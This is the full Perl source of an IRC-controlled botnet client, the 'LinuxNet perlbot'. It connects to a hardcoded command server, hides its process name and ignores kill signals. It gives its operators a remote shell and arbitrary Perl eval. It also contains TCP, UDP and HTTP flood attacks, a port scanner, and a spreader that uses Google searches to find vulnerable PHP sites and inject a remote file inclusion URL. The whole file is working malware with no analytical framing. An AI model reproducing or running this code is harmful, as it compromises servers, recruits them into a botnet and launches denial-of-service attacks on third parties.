|
#!/usr/bin/perl |
|
# ------------------------------------------------------------- # |
|
# LinuxNet perlbot # |
|
# ------------------------------------------------------------- # |
|
|
|
#system("kill -9 `ps ax |grep /usr/sbin/apache2/log |grep -v grep|awk '{print $1;}'`"); |
|
#system("kill -9 `ps ax |grep /usr/sbin/apache3/log |grep -v grep|awk '{print $1;}'`"); |
|
#system("kill -9 `ps ax |grep /usr/sbin/apache/log |grep -v grep|awk '{print $1;}'`"); |
|
#system("kill -9 `ps ax |grep /usr/sbin/httpd |grep -v grep|awk '{print $1;}'`"); |
|
#system("kill -9 `ps ax |grep /usr/sbin/atd |grep -v grep|awk '{print $1;}'`"); |
|
|
|
my $processo = '-'; |
|
|
|
|
|
my @titi = ("index.php?page=","main.php?page="); |
|
|
|
my $goni = $titi[rand scalar @titi]; |
|
|
|
my $linas_max='7'; |
|
my $sleep='7'; |
|
my @adms=("x","JB" ); |
|
my @hostauth=("localhost","outlaw"); |
|
my @canais=("#gnu"); |
|
my $nick='|GNU|'; |
|
my $ircname ='GNU'; |
|
chop (my $realname = `uname -sr`); |
|
$servidor='64.235.56.228' unless $servidor; |
|
my $porta='443'; |
|
my $VERSAO = '0.5'; |
|
$SIG{'INT'} = 'IGNORE'; |
|
$SIG{'HUP'} = 'IGNORE'; |
|
$SIG{'TERM'} = 'IGNORE'; |
|
$SIG{'CHLD'} = 'IGNORE'; |
|
$SIG{'PS'} = 'IGNORE'; |
|
use IO::Socket; |
|
use Socket; |
|
use IO::Select; |
|
chdir("/tmp"); |
|
$servidor="$ARGV[0]" if $ARGV[0]; |
|
$0="$processo"."\0"x16;; |
|
my $pid=fork; |
|
exit if $pid; |
|
die "Problema com o fork: $!" unless defined($pid); |
|
|
|
our %irc_servers; |
|
our %DCC; |
|
my $dcc_sel = new IO::Select->new(); |
|
|
|
$sel_cliente = IO::Select->new(); |
|
sub sendraw { |
|
if ($#_ == '1') { |
|
my $socket = $_[0]; |
|
print $socket "$_[1]\n"; |
|
} else { |
|
print $IRC_cur_socket "$_[0]\n"; |
|
} |
|
} |
|
|
|
sub conectar { |
|
my $meunick = $_[0]; |
|
my $servidor_con = $_[1]; |
|
my $porta_con = $_[2]; |
|
|
|
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); |
|
if (defined($IRC_socket)) { |
|
$IRC_cur_socket = $IRC_socket; |
|
|
|
$IRC_socket->autoflush(1); |
|
$sel_cliente->add($IRC_socket); |
|
|
|
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; |
|
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; |
|
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick; |
|
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; |
|
nick("$meunick"); |
|
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); |
|
sleep 1; |
|
} |
|
} |
|
my $line_temp; |
|
while( 1 ) { |
|
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } |
|
delete($irc_servers{''}) if (defined($irc_servers{''})); |
|
my @ready = $sel_cliente->can_read(0); |
|
next unless(@ready); |
|
foreach $fh (@ready) { |
|
$IRC_cur_socket = $fh; |
|
$meunick = $irc_servers{$IRC_cur_socket}{'nick'}; |
|
$nread = sysread($fh, $msg, 4096); |
|
if ($nread == 0) { |
|
$sel_cliente->remove($fh); |
|
$fh->close; |
|
delete($irc_servers{$fh}); |
|
} |
|
@lines = split (/\n/, $msg); |
|
|
|
for(my $c=0; $c<= $#lines; $c++) { |
|
$line = $lines[$c]; |
|
$line=$line_temp.$line if ($line_temp); |
|
$line_temp=''; |
|
$line =~ s/\r$//; |
|
unless ($c == $#lines) { |
|
parse("$line"); |
|
} else { |
|
if ($#lines == 0) { |
|
parse("$line"); |
|
} elsif ($lines[$c] =~ /\r$/) { |
|
parse("$line"); |
|
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { |
|
parse("$line"); |
|
} else { |
|
$line_temp = $line; |
|
} |
|
} |
|
} |
|
} |
|
} |
|
|
|
sub parse { |
|
my $servarg = shift; |
|
if ($servarg =~ /^PING \:(.*)/) { |
|
sendraw("PONG :$1"); |
|
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { |
|
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; |
|
if ($args =~ /^\001VERSION\001$/) { |
|
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001"); |
|
} |
|
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) { |
|
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) { |
|
if ($onde eq "$meunick"){ |
|
shell("$pn", "$args"); |
|
} |
|
if ($args =~ /^(\Q$meunick\E|\.say)\s+(.*)/ ) { |
|
my $natrix = $1; |
|
my $arg = $2; |
|
if ($arg =~ /^\!(.*)/) { |
|
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/); |
|
} elsif ($arg =~ /^\@(.*)/) { |
|
$ondep = $onde; |
|
$ondep = $pn if $onde eq $meunick; |
|
bfunc("$ondep","$1"); |
|
} else { |
|
shell("$onde", "$arg"); |
|
} |
|
} |
|
} |
|
} |
|
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { |
|
if (lc($1) eq lc($meunick)) { |
|
$meunick=$4; |
|
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick; |
|
} |
|
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) { |
|
nick("$meunick".int rand(999999)); |
|
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { |
|
$meunick = $2; |
|
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick; |
|
$irc_servers{$IRC_cur_socket}{'nome'} = "$1"; |
|
foreach my $canal (@canais) { |
|
sendraw("JOIN $canal ddosit"); |
|
} |
|
} |
|
} |
|
|
|
|
|
sub bfunc { |
|
my $printl = $_[0]; |
|
my $funcarg = $_[1]; |
|
if (my $pid = fork) { |
|
waitpid($pid, 0); |
|
} else { |
|
if (fork) { |
|
exit; |
|
} else { |
|
if ($funcarg =~ /^portscan (.*)/) { |
|
my $hostip="$1"; |
|
my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018"); |
|
my (@aberta, %porta_banner); |
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports."); |
|
foreach my $porta (@portas) { |
|
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4); |
|
if ($scansock) { |
|
push (@aberta, $porta); |
|
$scansock->close; |
|
} |
|
} |
|
|
|
if (@aberta) { |
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta"); |
|
} else { |
|
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found"); |
|
} |
|
} |
|
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) { |
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds."); |
|
my $itime = time; |
|
my ($cur_time); |
|
$cur_time = time - $itime; |
|
while ($3>$cur_time){ |
|
$cur_time = time - $itime; |
|
&tcpflooder("$1","$2","$3"); |
|
} |
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2."."); |
|
} |
|
if ($funcarg =~ /^version/) { |
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO); |
|
} |
|
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) { |
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds."); |
|
srand; |
|
my $itime = time; |
|
my ($cur_time); |
|
my ($exploited); |
|
$boturl=$2; |
|
$cur_time = time - $itime;$exploited = 0; |
|
while($1>$cur_time){ |
|
$cur_time = time - $itime; |
|
@urls=fetch(); |
|
foreach $url (@urls) { |
|
$cur_time = time - $itime; |
|
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/; |
|
|
|
$url =$path."/$goni$boturl" ; |
|
|
|
|
|
|
|
|
|
$page = http_query($url); |
|
$exploited = $exploited + 1; |
|
} |
|
} |
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds."); |
|
} |
|
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { |
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds."); |
|
my $itime = time; |
|
my ($cur_time); |
|
$cur_time = time - $itime; |
|
while ($2>$cur_time){ |
|
$cur_time = time - $itime; |
|
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); |
|
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; |
|
close($socket); |
|
} |
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1."."); |
|
} |
|
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { |
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds."); |
|
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); |
|
$dtime = 1 if $dtime == 0; |
|
my %bytes; |
|
$bytes{igmp} = $2 * $pacotes{igmp}; |
|
$bytes{icmp} = $2 * $pacotes{icmp}; |
|
$bytes{o} = $2 * $pacotes{o}; |
|
$bytes{udp} = $2 * $pacotes{udp}; |
|
$bytes{tcp} = $2 * $pacotes{tcp}; |
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1."."); |
|
} |
|
exit; |
|
} |
|
} |
|
} |
|
|
|
sub ircase { |
|
my ($kem, $printl, $case) = @_; |
|
|
|
if ($case =~ /^join (.*)/) { |
|
j("$1"); |
|
} |
|
|
|
if ($case =~ /^refresh (.*)/) { |
|
my $goni = $titi[rand scalar @titi]; |
|
} |
|
|
|
if ($case =~ /^part (.*)/) { |
|
p("$1"); |
|
} |
|
if ($case =~ /^rejoin\s+(.*)/) { |
|
my $chan = $1; |
|
if ($chan =~ /^(\d+) (.*)/) { |
|
for (my $ca = 1; $ca <= $1; $ca++ ) { |
|
p("$2"); |
|
j("$2"); |
|
} |
|
} else { |
|
p("$chan"); |
|
j("$chan"); |
|
} |
|
} |
|
if ($case =~ /^op/) { |
|
op("$printl", "$kem") if $case eq "op"; |
|
my $oarg = substr($case, 3); |
|
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); |
|
} |
|
if ($case =~ /^deop/) { |
|
deop("$printl", "$kem") if $case eq "deop"; |
|
my $oarg = substr($case, 5); |
|
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); |
|
} |
|
if ($case =~ /^msg\s+(\S+) (.*)/) { |
|
msg("$1", "$2"); |
|
} |
|
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { |
|
for (my $cf = 1; $cf <= $1; $cf++) { |
|
msg("$2", "$3"); |
|
} |
|
} |
|
if ($case =~ /^ctcp\s+(\S+) (.*)/) { |
|
ctcp("$1", "$2"); |
|
} |
|
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { |
|
for (my $cf = 1; $cf <= $1; $cf++) { |
|
ctcp("$2", "$3"); |
|
} |
|
} |
|
if ($case =~ /^nick (.*)/) { |
|
nick("$1"); |
|
} |
|
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { |
|
conectar("$2", "$1", 6667); |
|
} |
|
if ($case =~ /^raw (.*)/) { |
|
sendraw("$1"); |
|
} |
|
if ($case =~ /^eval (.*)/) { |
|
eval "$1"; |
|
} |
|
} |
|
|
|
sub shell { |
|
my $printl=$_[0]; |
|
my $comando=$_[1]; |
|
if ($comando =~ /cd (.*)/) { |
|
chdir("$1") || msg("$printl", "No such file or directory"); |
|
return; |
|
} |
|
elsif ($pid = fork) { |
|
waitpid($pid, 0); |
|
} else { |
|
if (fork) { |
|
exit; |
|
} else { |
|
my @resp=`$comando 2>&1 3>&1`; |
|
my $c=0; |
|
foreach my $linha (@resp) { |
|
$c++; |
|
chop $linha; |
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); |
|
if ($c == "$linas_max") { |
|
$c=0; |
|
sleep $sleep; |
|
} |
|
} |
|
exit; |
|
} |
|
} |
|
} |
|
|
|
sub tcpflooder { |
|
my $itime = time; |
|
my ($cur_time); |
|
my ($ia,$pa,$proto,$j,$l,$t); |
|
$ia=inet_aton($_[0]); |
|
$pa=sockaddr_in($_[1],$ia); |
|
$ftime=$_[2]; |
|
$proto=getprotobyname('tcp'); |
|
$j=0;$l=0; |
|
$cur_time = time - $itime; |
|
while ($l<1000){ |
|
$cur_time = time - $itime; |
|
last if $cur_time >= $ftime; |
|
$t="SOCK$l"; |
|
socket($t,PF_INET,SOCK_STREAM,$proto); |
|
connect($t,$pa)||$j--; |
|
$j++;$l++; |
|
} |
|
$l=0; |
|
while ($l<1000){ |
|
$cur_time = time - $itime; |
|
last if $cur_time >= $ftime; |
|
$t="SOCK$l"; |
|
shutdown($t,2); |
|
$l++; |
|
} |
|
} |
|
|
|
sub udpflooder { |
|
my $iaddr = inet_aton($_[0]); |
|
my $msg = 'A' x $_[1]; |
|
my $ftime = $_[2]; |
|
my $cp = 0; |
|
my (%pacotes); |
|
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; |
|
|
|
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; |
|
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; |
|
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; |
|
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; |
|
return(undef) if $cp == 4; |
|
my $itime = time; |
|
my ($cur_time); |
|
while ( 1 ) { |
|
for (my $porta = 1; $porta <= 65000; $porta++) { |
|
$cur_time = time - $itime; |
|
last if $cur_time >= $ftime; |
|
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; |
|
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; |
|
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; |
|
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; |
|
|
|
for (my $pc = 3; $pc <= 255;$pc++) { |
|
next if $pc == 6; |
|
$cur_time = time - $itime; |
|
last if $cur_time >= $ftime; |
|
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; |
|
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++; |
|
} |
|
} |
|
last if $cur_time >= $ftime; |
|
} |
|
return($cur_time, %pacotes); |
|
} |
|
|
|
sub ctcp { |
|
return unless $#_ == 1; |
|
sendraw("PRIVMSG $_[0] :\001$_[1]\001"); |
|
} |
|
sub msg { |
|
return unless $#_ == 1; |
|
sendraw("PRIVMSG $_[0] :$_[1]"); |
|
} |
|
sub notice { |
|
return unless $#_ == 1; |
|
sendraw("NOTICE $_[0] :$_[1]"); |
|
} |
|
sub op { |
|
return unless $#_ == 1; |
|
sendraw("MODE $_[0] +o $_[1]"); |
|
} |
|
sub deop { |
|
return unless $#_ == 1; |
|
sendraw("MODE $_[0] -o $_[1]"); |
|
} |
|
sub j { &join(@_); } |
|
sub join { |
|
return unless $#_ == 0; |
|
sendraw("JOIN $_[0]"); |
|
} |
|
sub p { part(@_); } |
|
sub part { |
|
sendraw("PART $_[0]"); |
|
} |
|
sub nick { |
|
return unless $#_ == 0; |
|
sendraw("NICK $_[0]"); |
|
} |
|
sub quit { |
|
sendraw("QUIT :$_[0]"); |
|
} |
|
|
|
# Spreader |
|
# this 'spreader' code isnot mine, i dont know who coded it. |
|
# update: well, i just fix0red this shit a bit. |
|
# |
|
|
|
sub fetch(){ |
|
my $rnd=(int(rand(9999))); |
|
my $n= 80; |
|
if ($rnd<5000) { $n<<=1;} |
|
my $s= (int(rand(5)) * $n); |
|
|
|
my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec", |
|
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop", |
|
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi", |
|
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk", |
|
"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir", |
|
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke", |
|
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm", |
|
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc", |
|
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz", |
|
"vu","vn","ye","yu","cd","zm","zw",""); |
|
my @str; |
|
|
|
foreach $dom (@dominios) |
|
{ |
|
push (@str,"allinurl:%22".$dom."/".$goni."%22"); |
|
} |
|
|
|
my $query="www.google.com/search?q="; |
|
$query.=$str[(rand(scalar(@str)))]; |
|
$query.="&num=$n&start=$s"; |
|
|
|
|
|
my @lst=(); |
|
my $page = http_query($query); |
|
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){ |
|
if ($1 !~ m/google|cache|translate/){ |
|
push (@lst,$1); |
|
} |
|
} |
|
return (@lst); |
|
} |
|
|
|
|
|
sub http_query($){ |
|
my ($url) = @_; |
|
my $host=$url; |
|
my $query=$url; |
|
|
|
my $page=""; |
|
$host =~ s/href=\"?http:\/\///; |
|
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; |
|
$query =~s/$host//; |
|
if ($query eq "") {$query="/";}; |
|
eval { |
|
local $SIG{ALRM} = sub { die "1";}; |
|
alarm 10; |
|
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; |
|
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; |
|
my @r = <$sock>; |
|
$page="@r"; |
|
alarm 0; |
|
close($sock); |
|
}; |
|
return $page; |
|
|
|
} |